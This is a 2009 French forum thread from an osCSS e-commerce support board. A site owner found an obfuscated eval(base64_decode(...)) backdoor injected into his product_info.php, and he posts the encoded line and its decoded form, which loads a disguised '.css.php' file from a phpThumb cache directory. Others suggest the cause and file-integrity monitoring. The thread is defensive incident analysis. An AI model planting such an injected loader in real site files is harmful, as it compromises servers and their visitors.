Attaque sur tinymce et son plugin ibrowser ???

Archive

Messagepar homer81737D46 » Lun 21 Déc 2009, 15:45

Bonjour je viens de trouver une ligne de code insérée par un pirate dans mon fichier product_info.php :
Code: Tout sélectionner
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lei4yMTgvbW9kZWxwcm8vd3d3L2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pYnJvd3Nlci9zY3JpcHRzL3BocFRodW1iL2NhY2hlLzAvMDMvMDM2LzAzNmQvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));

Une fois décrypté ce code donne :
Code: Tout sélectionner
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
$GLOBALS['mfsn']='/www/admin/includes/javascript/tiny_mce/plugins/ibrowser/scripts/phpThumb/cache/0/03/036/036d/style.css.php';
if(file_exists($GLOBALS['mfsn'])){
include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');
}}}

Inutile de vous préciser que le fichier cible existe et qu'il charge le serveur provoquant la fureur de mon hébergeur.

Connaissez vous des failles relatives à mon soucis ?
y a t il des patchs associés ?

je voudrais m'éviter une mise à jour complète de tinymce ...
Dernière édition par homer81737D46 le Lun 21 Déc 2009, 15:47, édité 1 fois.
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Messagepar homer81737D46 » Lun 21 Déc 2009, 16:34

Il semblerait que mon problème soit lié à la faille de sécurité de phpmyvisite
Cf autre personne infectée avec son analyse

je mets à jour phpmyvisite, je nettoie mon site et le remet en ligne, j essayerais de vous tenir informé..
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Messagepar cynic- » Lun 21 Déc 2009, 18:04

Merci et surtout bon courage :|
cynic-
Site Admin
 
Messages: 694
Inscription: Mar 04 Déc 2007, 13:04

Messagepar oscim » Lun 21 Déc 2009, 20:16

La conttrib sitemonitior, permt de faire un check des fichier présent.

Si le checksum et modifié, alors une alerte peut être envoyé au admin.

cf http://www.oscommerce.com/community/contributions,4441

D'autre part, le browser de fichier sont une faille recurente de secu, cf
http://dev.oscss.org/index.php?do=detai ... &project=1
Dernière édition par oscim le Lun 21 Déc 2009, 20:19, édité 1 fois.
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33


Retourner vers osCSS 1.2.1

 


  • Articles en relation
    Réponses
    Vus
    Dernier message

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron